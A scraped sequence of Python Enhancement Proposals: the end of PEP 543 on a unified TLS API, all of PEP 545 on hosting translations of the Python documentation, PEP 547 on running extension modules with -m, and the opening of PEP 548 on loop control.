possible relevant cryptographic functionality that could be provided by X509
certificates. Instead, all we need is the ability to signal the source of a
certificate to a concrete implementation.
For that reason, this certificate implementation defines only constructors. In
essence, the certificate object in this module could be as abstract as a handle
that can be used to locate a specific certificate.
Concrete implementations may choose to provide alternative constructors, e.g.
to load certificates from HSMs. If a common interface emerges for doing this,
this module may be updated to provide a standard constructor for this use-case
as well.
Concrete implementations should aim to have Certificate objects be hashable if
at all possible. This will help ensure that TLSConfiguration objects used with
an individual concrete implementation are also hashable.
class Certificate(metaclass=ABCMeta):
@abstractclassmethod
def from_buffer(cls, buffer: bytes):
"""
Creates a Certificate object from a byte buffer. This byte buffer
may be either PEM-encoded or DER-encoded. If the buffer is PEM
encoded it *must* begin with the standard PEM preamble (a series of
dashes followed by the ASCII bytes "BEGIN CERTIFICATE" and another
series of dashes). In the absence of that preamble, the
implementation may assume that the certificate is DER-encoded
instead.
"""
@abstractclassmethod
def from_file(cls, path: Union[pathlib.Path, AnyStr]):
"""
Creates a Certificate object from a file on disk. This method may
be a convenience method that wraps ``open`` and ``from_buffer``,
but some TLS implementations may be able to provide more-secure or
faster methods of loading certificates that do not involve Python
code.
"""
Private Keys
This module would define an abstract private key class. Much like the
Certificate class, this class has almost no behaviour in order to give as much
freedom as possible to the concrete implementations to treat keys carefully.
This class has all the caveats of the Certificate class.
class PrivateKey(metaclass=ABCMeta):
@abstractclassmethod
def from_buffer(cls,
buffer: bytes,
password: Optional[Union[Callable[[], Union[bytes, bytearray]], bytes, bytearray]] = None):
"""
Creates a PrivateKey object from a byte buffer. This byte buffer
may be either PEM-encoded or DER-encoded. If the buffer is PEM
encoded it *must* begin with the standard PEM preamble (a series of
dashes followed by the ASCII bytes "BEGIN", the key type, and
another series of dashes). In the absence of that preamble, the
implementation may assume that the private key is DER-encoded
instead.
The key may additionally be encrypted. If it is, the ``password``
argument can be used to decrypt the key. The ``password`` argument
may be a function to call to get the password for decrypting the
private key. It will only be called if the private key is encrypted
and a password is necessary. It will be called with no arguments,
and it should return either bytes or bytearray containing the
password. Alternatively, a bytes or bytearray value may be supplied
directly as the password argument. It will be ignored if the
private key is not encrypted and no password is needed.
"""
@abstractclassmethod
def from_file(cls,
path: Union[pathlib.Path, bytes, str],
password: Optional[Union[Callable[[], Union[bytes, bytearray]], bytes, bytearray]] = None):
"""
Creates a PrivateKey object from a file on disk. This method may
be a convenience method that wraps ``open`` and ``from_buffer``,
but some TLS implementations may be able to provide more-secure or
faster methods of loading private keys that do not involve Python
code.
The ``password`` parameter behaves exactly as the equivalent
parameter on ``from_buffer``.
"""
Trust Store
As discussed above, loading a trust store represents an issue because different
TLS implementations vary wildly in how they allow users to select trust stores.
For this reason, we need to provide a model that assumes very little about the
form that trust stores take.
This problem is the same as the one that the Certificate and PrivateKey types
need to solve. For this reason, we use the exact same model, by creating an
opaque type that can encapsulate the various means by which TLS backends may open
a trust store.
A given TLS implementation is not required to implement all of the
constructors. However, it is strongly recommended that a given TLS
implementation provide the system constructor if at all possible, as this
is the most common validation trust store that is used. Concrete
implementations may also add their own constructors.
Concrete implementations should aim to have TrustStore objects be hashable if
at all possible. This will help ensure that TLSConfiguration objects used with
an individual concrete implementation are also hashable.
class TrustStore(metaclass=ABCMeta):
@abstractclassmethod
def system(cls) -> TrustStore:
"""
Returns a TrustStore object that represents the system trust
database.
"""
@abstractclassmethod
def from_pem_file(cls, path: Union[pathlib.Path, bytes, str]) -> TrustStore:
"""
Initializes a trust store from a single file full of PEMs.
"""
Runtime Access
A not-uncommon use case is for library users to want the library to
control the TLS configuration while still selecting which backend is in use.
For example, users of Requests may want to be able to select between OpenSSL or
a platform-native solution on Windows and macOS, or between OpenSSL and NSS on
some Linux platforms. These users, however, may not care about exactly how
their TLS configuration is done.
This poses a problem: given an arbitrary concrete implementation, how can a
library work out how to load certificates into the trust store? There are two
options: either all concrete implementations can be required to fit into a
specific naming scheme, or we can provide an API that makes it possible to grab
these objects.
This PEP proposes that we use the second approach. This grants the greatest
freedom to concrete implementations to structure their code as they see fit,
requiring only that they provide a single object that has the appropriate
properties in place. Users can then pass this “backend” object to libraries
that support it, and those libraries can take care of configuring and using the
concrete implementation.
All concrete implementations must provide a method of obtaining a Backend
object. The Backend object can be a global singleton or can be created by a
callable if there is an advantage in doing that.
The Backend object has the following definition:
Backend = namedtuple(
'Backend',
['client_context', 'server_context',
'certificate', 'private_key', 'trust_store']
)
Each of the properties must provide the concrete implementation of the relevant
ABC. This ensures that code like this will work for any backend:
trust_store = backend.trust_store.system()
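A hedged sketch of how a library might consume such a backend; the function
name open_client_connection is hypothetical, and TLSConfiguration is the
configuration object described elsewhere in this PEP:
def open_client_connection(host, backend):
    trust_store = backend.trust_store.system()
    config = TLSConfiguration(trust_store=trust_store)
    context = backend.client_context(config)
    # ... wrap a socket or buffer pair using the context ...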
Changes to the Standard Library
The portions of the standard library that interact with TLS should be revised
to use these ABCs. This will allow them to function with other TLS backends.
This includes the following modules:
asyncio
ftplib
http
imaplib
nntplib
poplib
smtplib
urllib
Migration of the ssl module
Naturally, we will need to extend the ssl module itself to conform to these
ABCs. This extension will take the form of new classes, potentially in an
entirely new module. This will allow applications that take advantage of the
current ssl module to continue to do so, while enabling the new APIs for
applications and libraries that want to use them.
In general, migrating from the ssl module to the new ABCs is not expected
to be one-to-one. This is normally acceptable: most tools that use the ssl
module hide it from the user, and so refactoring to use the new module should
be invisible.
However, a specific problem comes from libraries or applications that leak
exceptions from the ssl module, either as part of their defined API or by
accident (which is easily done). Users of those tools may have written code
that tolerates and handles exceptions from the ssl module being raised:
migrating to the ABCs presented here would potentially cause the exceptions
defined above to be thrown instead, and existing except blocks will not
catch them.
For this reason, part of the migration of the ssl module would require that
the exceptions in the ssl module alias those defined above. That is, they
would require the following statements to all succeed:
assert ssl.SSLError is tls.TLSError
assert ssl.SSLWantReadError is tls.WantReadError
assert ssl.SSLWantWriteError is tls.WantWriteError
The exact mechanics of how this will be done are beyond the scope of this PEP,
as they are made more complex due to the fact that the current ssl
exceptions are defined in C code, but more details can be found in
an email sent to the Security-SIG by Christian Heimes.
Future
Major future TLS features may require revisions of these ABCs. These revisions
should be made cautiously: many backends may not be able to move forward
swiftly, and will be invalidated by changes in these ABCs. This is acceptable,
but wherever possible features that are specific to individual implementations
should not be added to the ABCs. The ABCs should restrict themselves to
high-level descriptions of IETF-specified features.
However, well-justified extensions to this API absolutely should be made. The
focus of this API is to provide a unifying lowest-common-denominator
configuration option for the Python community. TLS is not a static target, and
as TLS evolves so must this API.
Credits
This document has received extensive review from a number of individuals in the
community who have substantially helped shape it. Detailed review was provided
by:
Alex Chan
Alex Gaynor
Antoine Pitrou
Ashwini Oruganti
Donald Stufft
Ethan Furman
Glyph
Hynek Schlawack
Jim J Jewett
Nathaniel J. Smith
Alyssa Coghlan
Paul Kehrer
Steve Dower
Steven Fackler
Wes Turner
Will Bond
Further review was provided by the Security-SIG and python-ideas mailing lists.
Copyright
This document has been placed in the public domain.
| Withdrawn | PEP 543 – A Unified TLS API for Python | Standards Track | This PEP would define a standard TLS interface in the form of a collection of
abstract base classes. This interface would allow Python implementations and
third-party libraries to provide bindings to TLS libraries other than OpenSSL
that can be used by tools that expect the interface provided by the Python
standard library, with the goal of reducing the dependence of the Python
ecosystem on OpenSSL. |
PEP 545 – Python Documentation Translations
Author:
Julien Palard <julien at palard.fr>,
Inada Naoki <songofacandy at gmail.com>,
Victor Stinner <vstinner at python.org>
Status:
Final
Type:
Process
Created:
04-Mar-2017
Resolution:
Python-Dev message
Table of Contents
Abstract
Motivation
Rationale
Translation
Issue tracker
Branches
Hosting
Domain Name, Content negotiation and URL
Language Tag
Fetching And Building Translations
Community
Mailing List
Chat
Repository for PO Files
Translation tools
Documentation Contribution Agreement
Language Team
Alternatives
Simplified English
Changes
Get a Documentation Contribution Agreement
Migrate GitHub Repositories
Setup a GitHub bot for Documentation Contribution Agreement
Patch docsbuild-scripts to Compile Translations
List coordinators in the devguide
Create sphinx-doc Language Switcher
Update sphinx-doc Version Switcher
Enhance Rendering of Untranslated and Fuzzy Translations
New Translation Procedure
Designate a Coordinator
Create GitHub Repository
Setup the Documentation Contribution Agreement
Add support for translations in docsbuild-scripts
Add Translation to the Language Switcher
Previous Discussions
References
Copyright
Abstract
The intent of this PEP is to make existing translations of the Python
Documentation more accessible and discoverable. By doing so, we hope
to attract and motivate new translators and new translations.
Translated documentation will be hosted on python.org. Examples of
two active translation teams:
http://docs.python.org/fr/: French
http://docs.python.org/ja/: Japanese
http://docs.python.org/en/ will redirect to http://docs.python.org/.
Sources of translated documentation will be hosted in the Python
organization on GitHub: https://github.com/python/. Contributors will
have to accept a Documentation Contribution Agreement.
Motivation
On the French #python-fr IRC channel on freenode, it’s not rare to
meet people who don’t speak English and so are unable to read the
Python official documentation. Python wants to be widely available
to all users in any language: this is also why Python 3 supports
non-ASCII identifiers:
PEP 3131
There are at least 4 groups of people who are translating the Python
documentation to their native language (French [16] [17] [18],
Japanese [19] [20], Spanish [21], Hungarian [26] [27]) even
though their translations are not visible on d.p.o. Other, less
visible and less organized groups are also translating the
documentation; we've heard of Russian [25], Chinese, and
Korean. Others we haven’t found yet might also exist. This PEP
defines rules describing how to move translations on docs.python.org
so they can easily be found by developers, newcomers and potential
translators.
The Japanese team has (as of March 2017) translated ~80% of the
documentation, the French team ~20%. French translation went from 6%
to 23% in 2016 [13] with 7 contributors [14], proving a translation
team can outpace the rate at which the documentation changes.
Quoting Xiang Zhang about Chinese translations:
I have seen several groups trying to translate part of our official
doc. But their efforts are disperse and quickly become lost because
they are not organized to work towards a single common result and
their results are hold anywhere on the Web and hard to find. An
official one could help ease the pain.
Rationale
Translation
Issue tracker
Considering that issues opened about translations may be written in
the translation language, which can be considered noise, or at least
inconsistent, issues should be placed outside bugs.python.org (b.p.o).
As all translations must have their own GitHub project (see Repository
for PO Files), they must use the associated GitHub issue tracker.
Considering the noise induced by translation issues written in any
language, which may land on b.p.o despite every warning, triage will
have to be done. Considering that translations already exist and are
not actually a source of noise in b.p.o, an unmanageable amount of
work is not to be expected. Considering that Xiang Zhang and Victor
Stinner are already triaging, and Julien Palard is willing to help on
this task, noise on b.p.o is not to be expected.
Also, language team coordinators (see Language Team) should help
with triaging b.p.o by properly indicating, in the language of the
issue author if required, the right issue tracker.
Branches
Translation teams should focus on last stable versions, and use tools
(scripts, translation memory, …) to automatically translate what is
done in one branch to other branches.
Note
Translation memories are a kind of database of previously translated
paragraphs, even removed ones. See also Sphinx Internationalization.
The three currently stable branches that will be translated are [12]:
2.7, 3.5, and 3.6. The scripts to build the documentation of older
branches need to be modified to support translation [12], whereas
these branches now only accept security-only fixes.
The development branch (main) should have a lower translation priority
than stable branches. But docsbuild-scripts should build it anyway so
it is possible for a team to work on it to be ready for the next
release.
Hosting
Domain Name, Content negotiation and URL
Different translations can be identified by changing one of the
following: Country Code Top Level Domain (CCTLD),
path segment, subdomain or content negotiation.
Buying a CCTLD for each translation is expensive, time-consuming, and
sometimes almost impossible when the domain is already registered, so this
solution should be avoided.
Using subdomains like “es.docs.python.org” or “docs.es.python.org” is
possible but confusing (“is it es.docs.python.org or
docs.es.python.org?”). Hyphens in subdomains like
pt-br.doc.python.org are uncommon, and SEOMoz [23] identified the
presence of hyphens as a negative factor. Usage of underscores in
subdomains is prohibited by RFC 1123, section 2.1. Finally,
using subdomains means creating TLS certificates for each
language. This not only requires more maintenance but will also cause
issues in the language switcher if, as for the version switcher, we want a
preflight request to check whether the translation exists in the given version:
the preflight will probably be blocked by the same-origin policy. Wildcard
TLS certificates are very expensive.
Using content negotiation (HTTP headers Accept-Language in the
request and Vary: Accept-Language) leads to a bad user experience
where they can’t easily change the language. According to Mozilla:
“This header is a hint to be used when the server has no way of
determining the language via another way, like a specific URL, that is
controlled by an explicit user decision.” [24]. As we want to be
able to easily change the language, we should not use the content
negotiation as the main means of language determination, so we need something
else.
The last solution is to use the URL path, which looks readable, allows
for an easy switch from one language to another, and nicely accepts
hyphens. Typically something like: “docs.python.org/de/” or, by
using a hyphen: “docs.python.org/pt-BR/”.
As for the version, sphinx-doc does not support compiling for multiple
languages, so we’ll have full builds rooted under a path, exactly like
we’re already doing with versions.
So we can have “docs.python.org/de/3.6/” or
“docs.python.org/3.6/de/”. A question that arises is:
“Does the language contain multiple versions or does the version contain
multiple languages?”. As versions exist in any case and translations
for a given version may or may not exist, we may prefer
“docs.python.org/3.6/de/”, but doing so scatters languages everywhere.
Having “/de/3.6/” is clearer, meaning: “everything under /de/ is written
in German”. Having the version at the end is also a habit taken by
readers of the documentation: they like to easily change the version
by changing the end of the path.
So we should use the following pattern:
“docs.python.org/LANGUAGE_TAG/VERSION/”.
The current documentation is not moved to “/en/”, instead
“docs.python.org/en/” will redirect to “docs.python.org”.
Language Tag
A common notation for language tags is the IETF Language Tag
[4] based on ISO 639, although gettext uses ISO 639 tags with
underscores (ex: pt_BR) instead of dashes to join tags [5]
(ex: pt-BR). Examples of IETF Language Tags: fr (French),
ja (Japanese), pt-BR (Orthographic formulation of 1943 -
Official in Brazil).
It is more common to see dashes instead of underscores in URLs [6],
so we should use IETF language tags, even if sphinx uses gettext
internally: URLs are not meant to leak the underlying implementation.
It’s uncommon to see capitalized letters in URLs, and docs.python.org
doesn’t use any, so it may hurt readability by attracting the eye to it,
like in: “https://docs.python.org/pt-BR/3.6/library/stdtypes.html”.
RFC 5646 (Tags for Identifying Languages (IETF)), section 2.1.1,
states that tags are not case sensitive. As the RFC allows lower case,
and it enhances readability, we should use lowercased tags like
pt-br.
We may drop the region subtag when it does not add distinguishing
information, for example: “de-DE” or “fr-FR”. (Although it might
make sense, respectively meaning “German as spoken in Germany”
and “French as spoken in France”). But when the region subtag
actually adds information, for example “pt-BR” or “Portuguese as
spoken in Brazil”, it should be kept.
So we should use IETF language tags, lowercased, like /fr/,
/pt-br/, /de/ and so on.
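For illustration, a hedged sketch of turning a gettext-style locale name
(pt_BR) into the lowercased IETF-style tag used in URLs (pt-br); the helper
name url_language_tag is hypothetical:
def url_language_tag(locale_name: str) -> str:
    # Replace the gettext underscore with a dash and lowercase the result.
    return locale_name.replace("_", "-").lower()
assert url_language_tag("pt_BR") == "pt-br"
assert url_language_tag("fr") == "fr"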
Fetching And Building Translations
Currently docsbuild-scripts are building the documentation [8].
These scripts should be modified to fetch and build translations.
Building new translations is like building new versions, so while we’re
adding complexity, it is not that much.
Two steps should be configurable distinctively: Building a new language,
and adding it to the language switcher. This allows a transition step
between “we accepted the language” and “it is translated enough to be
made public”. During this step, translators can review their
modifications on d.p.o without having to build the documentation
locally.
From the translation repositories, only the .po files should be
opened by the docsbuild-script to keep the attack surface and probable
bug sources at a minimum. This means no translation can patch sphinx
to advertise their translation tool. (This specific feature should be
handled by sphinx anyway [9]).
Community
Mailing List
The doc-sig mailing list will be used to discuss cross-language
changes on translated documentation.
There is also the i18n-sig list but it’s more oriented towards i18n APIs
[1] than translating the Python documentation.
Chat
Due to the Python community being highly active on IRC, we should
create a new IRC channel on freenode, typically #python-doc for
consistency with the mailing list name.
Each language coordinator can organize their own team, even by choosing
another chat system if the local usage asks for it. As local teams
will write in their native languages, we don’t want each team in a
single channel. It’s also natural for the local teams to reuse
their local channels like “#python-fr” for French translators.
Repository for PO Files
Considering that each translation team may want to use different
translation tools, and that those tools should easily be synchronized
with git, all translations should expose their .po files via a git
repository.
Considering that each translation will be exposed via git
repositories, and that Python has migrated to GitHub, translations
will be hosted on GitHub.
For consistency and discoverability, all translations should be in the
same GitHub organization and named according to a common pattern.
Given that we want translations to be official, and that Python
already has a GitHub organization, translations should be hosted as
projects of the Python GitHub organization.
For consistency, translation repositories should be called
python-docs-LANGUAGE_TAG [22], using the language tag used in
paths: without region subtag if redundant, and lowercased.
The docsbuild-scripts may enforce this rule by refusing to fetch
outside of the Python organization or a wrongly named repository.
The CLA bot may be used on the translation repositories, but with a
limited effect as local coordinators may synchronize themselves with
translations from an external tool, like Transifex, and lose track
of who translated what in the process.
Versions can be hosted on different repositories, different directories
or different branches. Storing them on different repositories will
probably pollute the Python GitHub organization. As it
is typical and natural to use branches to separate versions, branches
should be used to do so.
Translation tools
Most of the translation work is actually done on Transifex [15].
Other tools may be used later like https://pontoon.mozilla.org/
and http://zanata.org/.
Documentation Contribution Agreement
Documentation does require a license from the translator, as it
involves creativity in the expression of the ideas.
There are multiple solutions; quoting Van Lindberg from the PSF, when asked
about the subject:
Docs should either have the copyright assigned or be under CC0. A
permissive software license (like Apache or MIT) would also get the
job done, although it is not quite fit for task.
The translators should either sign an agreement or submit a
declaration of the license with the translation.
We should have in the project page an invitation for people to
contribute under a defined license, with acceptance defined by their
act of contribution. Such as:
“By posting this project on Transifex and inviting you to
participate, we are proposing an agreement that you will provide
your translation for the PSF’s use under the CC0 license. In return,
you may note that you were the translator for the portion you
translate. You signify acceptance of this agreement by submitting
your work to the PSF for inclusion in the documentation.”
It looks like having a “Documentation Contribution Agreement”
is the simplest thing we can do, as we can use multiple means (GitHub
bots, an invitation page, …) in different contexts to ensure contributors
agree with it.
Language Team
Each language team should have one coordinator responsible for:
Managing the team.
Choosing and managing the tools the team will use (chat, mailing list, …).
Ensuring contributors understand and agree with the documentation
contribution agreement.
Ensuring quality (grammar, vocabulary, consistency, filtering spam, ads, …).
Redirecting issues posted on b.p.o to the correct GitHub issue tracker
for the language.
Alternatives
Simplified English
It would be possible to introduce a “simplified English” version like
Wikipedia did [10], as discussed on python-dev [11], targeting
English learners and children.
Pros: It yields a single translation, theoretically readable by
everyone and reviewable by current maintainers.
Cons: Subtle details may be lost, and translators from English to English
may be hard to find as stated by Wikipedia:
> The main English Wikipedia has 5 million articles, written by nearly
140K active users; the Swedish Wikipedia is almost as big, 3M articles
from only 3K active users; but the Simple English Wikipedia has just
123K articles and 871 active users. That’s fewer articles than
Esperanto!
Changes
Get a Documentation Contribution Agreement
The Documentation Contribution Agreement has to be written by the
PSF, then listed at https://www.python.org/psf/contrib/ and have its
own page like https://www.python.org/psf/contrib/doc-contrib-form/.
Migrate GitHub Repositories
We (authors of this PEP) already own French and Japanese Git repositories,
so moving them to the Python documentation organization will not be a
problem. We’ll however be following the New Translation Procedure.
Setup a GitHub bot for Documentation Contribution Agreement
To help ensure that contributors from GitHub have signed the
Documentation Contribution Agreement, we can set up the “The Knights
Who Say Ni” GitHub bot, customized for this agreement, on the migrated
repositories [28].
Patch docsbuild-scripts to Compile Translations
Docsbuild-scripts must be patched to:
List the language tags to build along with the branches to build.
List the language tags to display in the language switcher.
Find translation repositories by formatting
github.com:python/python-docs-{language_tag}.git (see
Repository for PO Files; a sketch follows below).
Build translations for each branch and each language.
Patched docsbuild-scripts must only open .po files from
translation repositories.
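For illustration, a hedged sketch of deriving the clone URL of a translation
repository from its language tag, following the naming rule above; the helper
name is hypothetical:
def translation_repository(language_tag: str) -> str:
    return "github.com:python/python-docs-{}.git".format(language_tag.lower())
assert translation_repository("pt-br") == "github.com:python/python-docs-pt-br.git"
assert translation_repository("ja") == "github.com:python/python-docs-ja.git"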
List coordinators in the devguide
Add a page or a section with an empty list of coordinators to the
devguide; each new coordinator will be added to this list.
Create sphinx-doc Language Switcher
Highly similar to the version switcher, a language switcher must be
implemented. This language switcher must be configurable to hide or
show a given language.
The language switcher will only have to update or add the language
segment to the path like the current version switcher does. Unlike
the version switcher, no preflight is required as the destination page
always exists (translations do not add or remove pages).
Untranslated (but existing) pages still exist; they should however be
rendered as such, see Enhance Rendering of Untranslated and Fuzzy
Translations.
Update sphinx-doc Version Switcher
The patch_url function of the version switcher in
version_switch.js has to be updated to understand and allow the
presence of the language segment in the path.
Enhance Rendering of Untranslated and Fuzzy Translations
It’s an open Sphinx issue [9], but we’ll need it, so we’ll have to
work on it. Translated, fuzzy, and untranslated paragraphs should be
differentiated. (Fuzzy paragraphs have to warn the reader that what
they’re reading may be out of date.)
New Translation Procedure
Designate a Coordinator
The first step is to designate a coordinator, see Language Team.
The coordinator must sign the CLA.
The coordinator should be added to the list of translation coordinators
on the devguide.
Create GitHub Repository
Create a repository named “python-docs-{LANGUAGE_TAG}” (IETF language
tag, without redundant region subtag, with a dash, and lowercased.) on
the Python GitHub organization (see Repository for PO Files), and
grant the language coordinator push rights to this repository.
Setup the Documentation Contribution Agreement
The README file should clearly show the following Documentation
Contribution Agreement:
NOTE REGARDING THE LICENSE FOR TRANSLATIONS: Python's documentation is
maintained using a global network of volunteers. By posting this
project on Transifex, GitHub, and other public places, and inviting
you to participate, we are proposing an agreement that you will
provide your improvements to Python's documentation or the translation
of Python's documentation for the PSF's use under the CC0 license
(available at
`https://creativecommons.org/publicdomain/zero/1.0/legalcode`_). In
return, you may publicly claim credit for the portion of the
translation you contributed and if your translation is accepted by the
PSF, you may (but are not required to) submit a patch including an
appropriate annotation in the Misc/ACKS or TRANSLATORS file. Although
nothing in this Documentation Contribution Agreement obligates the PSF
to incorporate your textual contribution, your participation in the
Python community is welcomed and appreciated.
You signify acceptance of this agreement by submitting your work to
the PSF for inclusion in the documentation.
Add support for translations in docsbuild-scripts
As soon as the translation hits its first commits, update the
docsbuild-scripts configuration to build the translation (but not
to display it in the language switcher).
Add Translation to the Language Switcher
As soon as the translation hits:
100% of bugs.html with proper links to the language repository
issue tracker.
100% of tutorial.
100% of library/functions (builtins).
the translation can be added to the language switcher.
Previous Discussions
[Python-ideas] Cross link documentation translations (January, 2016)
[Python-Dev] Translated Python documentation (February 2016)
[Python-ideas] https://docs.python.org/fr/ ? (March 2016)
References
[1]
[I18n-sig] Hello Python members, Do you have any idea about
Python documents?
(https://mail.python.org/pipermail/i18n-sig/2013-September/002130.html)
[2] [Doc-SIG] Localization of Python docs
(https://mail.python.org/pipermail/doc-sig/2013-September/003948.html)
[4]
IETF language tag
(https://en.wikipedia.org/wiki/IETF_language_tag)
[5]
GNU Gettext manual, section 2.3.1: Locale Names
(https://www.gnu.org/software/gettext/manual/html_node/Locale-Names.html)
[6]
Semantic URL: Slug
(https://en.wikipedia.org/wiki/Clean_URL#Slug)
[8]
Docsbuild-scripts GitHub repository
(https://github.com/python/docsbuild-scripts/)
[9] (1, 2)
i18n: Highlight untranslated paragraphs
(https://github.com/sphinx-doc/sphinx/issues/1246)
[10]
Wikipedia: Simple English
(https://simple.wikipedia.org/wiki/Main_Page)
[11]
Python-dev discussion about simplified English
(https://mail.python.org/pipermail/python-dev/2017-February/147446.html)
[12] (1, 2)
Passing options to sphinx from Doc/Makefile
(https://github.com/python/cpython/commit/57acb82d275ace9d9d854b156611e641f68e9e7c)
[13]
French translation progression
(https://mdk.fr/pycon2016/#/11)
[14]
French translation contributors
(https://github.com/AFPy/python_doc_fr/graphs/contributors?from=2016-01-01&to=2016-12-31&type=c)
[15]
Python-doc on Transifex
(https://www.transifex.com/python-doc/public/)
[16]
French translation
(https://www.afpy.org/doc/python/)
[17]
French translation on Gitea
(https://git.afpy.org/AFPy/python-docs-fr)
[18]
French mailing list
(http://lists.afpy.org/mailman/listinfo/traductions)
[19]
Japanese translation
(http://docs.python.jp/3/)
[20]
Japanese translation on GitHub
(https://github.com/python-doc-ja/python-doc-ja)
[21]
Spanish translation
(https://docs.python.org/es/3/tutorial/index.html)
[22]
[Python-Dev] Translated Python documentation: doc vs docs
(https://mail.python.org/pipermail/python-dev/2017-February/147472.html)
[23]
Domains - SEO Best Practices | Moz
(https://moz.com/learn/seo/domain)
[24]
Accept-Language
(https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Accept-Language)
[25]
Документация Python 2.7!
(http://python-lab.ru/documentation/index.html)
[26]
Python-oktató
(http://web.archive.org/web/20170526080729/http://harp.pythonanywhere.com/python_doc/tutorial/index.html)
[27]
The Python-hu Archives
(https://mail.python.org/pipermail/python-hu/)
[28]
[Python-Dev] PEP 545: Python Documentation Translations
(https://mail.python.org/pipermail/python-dev/2017-April/147752.html)
Copyright
This document has been placed in the public domain.
| Final | PEP 545 – Python Documentation Translations | Process | The intent of this PEP is to make existing translations of the Python
Documentation more accessible and discoverable. By doing so, we hope
to attract and motivate new translators and new translations. |
PEP 547 – Running extension modules using the -m option
Author:
Marcel Plch <gmarcel.plch at gmail.com>,
Petr Viktorin <encukou at gmail.com>
Status:
Deferred
Type:
Standards Track
Created:
25-May-2017
Python-Version:
3.7
Post-History:
Table of Contents
Deferral Notice
Abstract
Motivation
Rationale
Background
Proposal
Specification
ExtensionFileLoader Changes
Backwards Compatibility
Reference Implementation
Copyright
Deferral Notice
Cython – the most important use case for this PEP and the only explicit
one – is not ready for multi-phase initialization yet.
It keeps global state in C-level static variables.
See discussion at Cython issue 1923.
The PEP is deferred until the situation changes.
Abstract
This PEP proposes an implementation that allows built-in and extension
modules to be executed in the __main__ namespace using
the PEP 489 multi-phase initialization.
With this, a multi-phase initialization enabled module can be run
using the following command:
$ python3 -m _testmultiphase
This is a test module named __main__.
Motivation
Currently, extension modules do not support all functionality of
Python source modules.
Specifically, it is not possible to run extension modules as scripts using
Python’s -m option.
The technical groundwork to make this possible has been done for PEP 489,
and enabling the -m option is listed in that PEP’s
“Possible Future Extensions” section.
Technically, the additional changes proposed here are relatively small.
Rationale
Extension modules’ lack of support for the -m option has traditionally
been worked around by providing a Python wrapper.
For example, the _pickle module’s command line interface is in the
pure-Python pickle module (along with a pure-Python reimplementation).
This works well for standard library modules, as building command line
interfaces using the C API is cumbersome.
However, other users may want to create executable extension modules directly.
An important use case is Cython, a Python-like language that compiles to
C extension modules.
Cython is a (near) superset of Python, meaning that compiling a Python module
with Cython will typically not change the module’s functionality, allowing
Cython-specific features to be added gradually.
This PEP will allow Cython extension modules to behave the same as their Python
counterparts when run using the -m option.
Cython developers consider the feature worth implementing (see
Cython issue 1715).
Background
Python’s -m option is handled by the function
runpy._run_module_as_main.
The module specified by -m is not imported normally.
Instead, it is executed in the namespace of the __main__ module,
which is created quite early in interpreter initialization.
For Python source modules, running in another module’s namespace is not
a problem: the code is executed with locals and globals set to the
existing module’s __dict__.
This is not the case for extension modules, whose PyInit_* entry point
traditionally both created a new module object (using PyModule_Create),
and initialized it.
Since Python 3.5, extension modules can use PEP 489 multi-phase initialization.
In this scenario, the PyInit_* entry point returns a PyModuleDef
structure: a description of how the module should be created and initialized.
The extension can choose to customize creation of the module object using
the Py_mod_create callback, or opt to use a normal module object by not
specifying Py_mod_create.
Another callback, Py_mod_exec, is then called to initialize the module
object, e.g. by populating it with methods and classes.
Proposal
Multi-phase initialization makes it possible to execute an extension module in
another module’s namespace: if a Py_mod_create callback is not specified,
the __main__ module can be passed to the Py_mod_exec callback to be
initialized, as if __main__ was a freshly constructed module object.
One complication in this scheme is C-level module state.
Each module has a md_state pointer that points to a region of memory
allocated when an extension module is created.
The PyModuleDef specifies how much memory is to be allocated.
The implementation must take care that md_state memory is allocated at most
once.
Also, the Py_mod_exec callback should only be called once per module.
The implications of multiply-initialized modules are too subtle to expect
extension authors to reason about them.
The md_state pointer itself will serve as a guard: allocating the memory
and calling Py_mod_exec will always be done together, and initializing an
extension module will fail if md_state is already non-NULL.
Since the __main__ module is not created as an extension module,
its md_state is normally NULL.
Before initializing an extension module in __main__’s context, its module
state will be allocated according to the PyModuleDef of that module.
While PEP 489 was designed to make these changes generally possible,
it’s necessary to decouple module discovery, creation, and initialization
steps for extension modules, so that another module can be used instead of
a newly initialized one, and the functionality needs to be added to
runpy and importlib.
Specification
A new optional method for importlib loaders will be added.
This method will be called exec_in_module and will take two
positional arguments: module spec and an already existing module.
Any import-related attributes, such as __spec__ or __name__,
already set on the module will be ignored.
The runpy._run_module_as_main function will look for this new
loader method.
If it is present, runpy will execute it instead of trying to load and
run the module’s Python code.
Otherwise, runpy will act as before.
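For illustration, a hedged sketch of the lookup runpy._run_module_as_main
could perform, as described above; names other than exec_in_module are
simplified and this is not the actual runpy code:
def run_module_as_main_sketch(spec, main_module):
    loader = spec.loader
    if hasattr(loader, "exec_in_module"):
        # New behaviour: execute the extension module in __main__'s namespace.
        return loader.exec_in_module(spec, main_module)
    # Existing behaviour: fall back to loading the module's Python code
    # and executing it in __main__ (elided here).
    ...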
ExtensionFileLoader Changes
importlib’s ExtensionFileLoader will get an implementation of
exec_in_module that will call a new function, _imp.exec_in_module.
_imp.exec_in_module will use existing machinery to find and call an
extension module’s PyInit_* function.
The PyInit_* function can return either a fully initialized module
(single-phase initialization) or a PyModuleDef (for PEP 489 multi-phase
initialization).
In the single-phase initialization case, _imp.exec_in_module will raise
ImportError.
In the multi-phase initialization case, the PyModuleDef and the module to
be initialized will be passed to a new function, PyModule_ExecInModule.
This function raises ImportError if the PyModuleDef specifies
a Py_mod_create slot, or if the module has already been initialized
(i.e. its md_state pointer is not NULL).
Otherwise, the function will initialize the module according to the
PyModuleDef.
Backwards Compatibility
This PEP maintains backwards compatibility.
It only adds new functions, and a new loader method that is added for
a loader that previously did not support running modules as __main__.
Reference Implementation
The reference implementation of this PEP is available at GitHub.
Copyright
This document has been placed in the public domain.
| Deferred | PEP 547 – Running extension modules using the -m option | Standards Track | This PEP proposes an implementation that allows built-in and extension
modules to be executed in the __main__ namespace using
the PEP 489 multi-phase initialization. |
PEP 548 – More Flexible Loop Control
Author:
R David Murray
Status:
Rejected
Type:
Standards Track
Created:
05-Sep-2017
Python-Version:
3.7
Post-History:
05-Aug-2017
Table of Contents
Rejection Note
Abstract
Motivation
Syntax
Semantics
Justification and Examples
Copyright
Rejection Note
Rejection by Guido:
https://mail.python.org/pipermail/python-dev/2017-September/149232.html
Abstract
This PEP proposes enhancing the break and continue statements
with an optional boolean expression that controls whether or not
they execute. This allows the flow of control in loops to be
expressed more clearly and compactly.
Motivation
Quoting from the rejected PEP 315:
It is often necessary for some code to be executed before each
evaluation of the while loop condition. This code is often
